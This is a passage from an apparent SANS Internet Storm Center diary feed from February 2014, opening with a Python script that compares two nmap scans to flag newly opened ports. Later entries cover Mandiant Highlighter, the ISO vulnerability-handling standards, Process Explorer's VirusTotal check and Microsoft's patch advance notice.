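                parts = port_spec.strip().split("/")
                if len(parts) < 5:
                    continue
                port, state, proto, _owner, service = parts[:5]
                if state == "open":
                    entry[(int(port), proto)] = service
    return open_ports


def diff_scans(old_text, new_text):
    """Return (opened, closed): sorted lists of (ip, port, proto, service).

    A host that answered yesterday but not today shows up with all of its
    ports 'closed'; treat that as a host-down event, not a fix.
    """
    old, new = parse_gnmap(old_text), parse_gnmap(new_text)
    opened, closed = [], []
    for ip in sorted(set(old) | set(new)):
        before, after = old.get(ip, {}), new.get(ip, {})
        for key in sorted(after.keys() - before.keys()):
            opened.append((ip, key[0], key[1], after[key]))
        for key in sorted(before.keys() - after.keys()):
            closed.append((ip, key[0], key[1], before[key]))
    return opened, closed


if __name__ == "__main__":
    opened, closed = diff_scans(YESTERDAY, TODAY)
    for ip, port, proto, service in opened:
        print(f"OPENED {ip} {port}/{proto} ({service})")
    for ip, port, proto, service in closed:
        print(f"CLOSED {ip} {port}/{proto} ({service})")
```

nmap also ships ndiff, which does the same comparison on its XML (-oX) output; the point of writing it out is to see that the check is a set difference per host, and that the interesting output is the short "opened" list, which is what should page someone.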

You'd be surprised what a full port scan might find: those issues we're stuck with on open ports on home firewalls (https://isc.sans.edu/forums/diary/Scans+Increase+for+New+Linksys+Backdoor+32764+TCP+/17336 and https://isc.sans.edu/diary/Exposed+UPNP+Devices/15040 for instance) would have been caught a long time ago if more folks scanned their infrastructure from the untrusted outside network! Mind you, home users typically never patch their firewalls anyway, so all those open UPnP and other backdoor ports are with us for the long haul now.

Do you regularly scan your firewall from the outside?  Does your scan highlight changes, or are you looking for just vulnerabilities (using Nessus or similar) rather than changes?   Let us know in our comment form below.

===============
Rob VandenBrink
Metafore


ISC StormCast for Monday, February 10th 2014 http://isc.sans.edu/podcastdetail.html?id=3833, (Mon, Feb 10th)

Sun, 02/09/2014 - 20:07

Mandiant Highlighter 2, (Sun, Feb 9th)

Sun, 02/09/2014 - 10:38

In the previous diary I discussed the basic usage of Mandiant Highlighter. In this diary I will discuss some other features.

 

Mandiant Highlighter Graphic

The graphic is an overall view of the whole file. Each line/bar on the graph represents a line in the text, and the bar lengths are proportional to the line lengths in the file. When you highlight a word in the text it is highlighted on the graph as well.

If you would like to specify the range of data to display, enter the range in the "Zoom Control" section at the bottom right of the screen.

Windows Event Viewer:

To view Windows events, you first have to export them to a .txt file. Here are the steps to save an event log to a text file:

1- Right-click on the event category.

2- Select "Save All Events As ...".

3- Type the file name and select Text from the "Save as type" drop-down menu.

Now you can use Mandiant Highlighter to parse the Windows events.

 

Regular Expressions:

Can you imagine a powerful log parser without regular expression support? To use regular expressions in Mandiant Highlighter, enter the regular expression in the Keyword box, then select Case Sensitive RegExp or Case Insensitive RegExp from the drop-down menu.

New ISO Standards on Vulnerability Handling and Disclosure, (Fri, Feb 7th)

Fri, 02/07/2014 - 05:26

Also in the news, ISO standard 30111 was published recently (on Jan 21), a standard for Vulnerability Handling Processes. The standard was edited by Katie Moussouris, Senior Security Strategist Lead at Microsoft.

The standard covers all the basics, including Vulnerability Verification steps, the Vulnerability Handling Process, and of particular interest is that it delineates where vendors should and should not be in the process.

The companion document, ISO 29147 (published in 2013), covers Vulnerability Disclosure. This one is extremely valuable both to security researchers and to any company with a software product. This standard includes guidance on building a framework to address vulnerabilities, including a 5-step process that guides vendors through initial receipt and verification of the vulnerability, developing a resolution, releasing the final fix, and communication with customers after the fix is released.

As with all ISO standards, unfortunately these are not free - both are well worth it if the standards apply to your organization.  If your organization writes code, or if you sell hardware that runs code, both of these standards are a must-have.
ISO 30111 can be purchased here: http://www.iso.org/iso/catalogue_detail.htm?csnumber=53231
ISO 29147 can be purchased here: http://www.iso.org/iso/catalogue_detail.htm?csnumber=45170

===============
Rob VandenBrink
Metafore


ISC StormCast for Friday, February 7th 2014 http://isc.sans.edu/podcastdetail.html?id=3830, (Fri, Feb 7th)

Thu, 02/06/2014 - 18:24

Hello Virustotal? It's Microsoft Calling., (Fri, Feb 7th)

Thu, 02/06/2014 - 18:18

You might think that phone call unlikely, but as of this week it's built in and is likely happening right now.

I was poking around in the latest version of Sysinternals, and tripped over a new option. You can now check any running process against VirusTotal with a simple right-click in the latest version of Process Explorer: it submits the hash of the process's image file (and, if you turn that option on, unknown files themselves) and shows the detection ratio next to the process.

If that's not just the coolest thing! If your AV product isn't triggering on a suspect process, you can now query all the AV engines without having to hunt down and upload the file yourself. One caveat for incident responders: the check works on the on-disk image, so a process whose file has already been deleted, or code that only lives injected inside another process, has nothing for Process Explorer to hash.

 

Sysinternals: http://technet.microsoft.com/en-us/sysinternals

VirusTotal: https://www.virustotal.com/

===============
Rob VandenBrink
Metafore


Microsoft Advance Notification for February 2014, (Fri, Feb 7th)

Thu, 02/06/2014 - 17:51

Today Microsoft published the advance notification for this month's security bulletins. The bulletins will be published on February 11th (coming Tuesday) [1]. Again, we will have a pretty light patch day, with only 5 bulletins, and only 2 of these bulletins are considered critical.

Noteworthy: No Internet Explorer patches and no Office patches. We will only see Windows patches, a patch for .Net and a "Security Software" patch.

Not part of Patch Tuesday, but still happening on the same day: Microsoft will no longer allow MD5 hashes for certificate signatures. This may be difficult for some applications that haven't been changed over yet, even though Microsoft gave ample warning, and MD5 has been shown to be badly broken for certificate signatures for a few years now. Just earlier today I ran into a brand new, pretty expensive Axis network camera that only allows the use of MD5-hashed certificate signatures.

 

[1] http://technet.microsoft.com/en-us/security/bulletin/ms14-feb

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
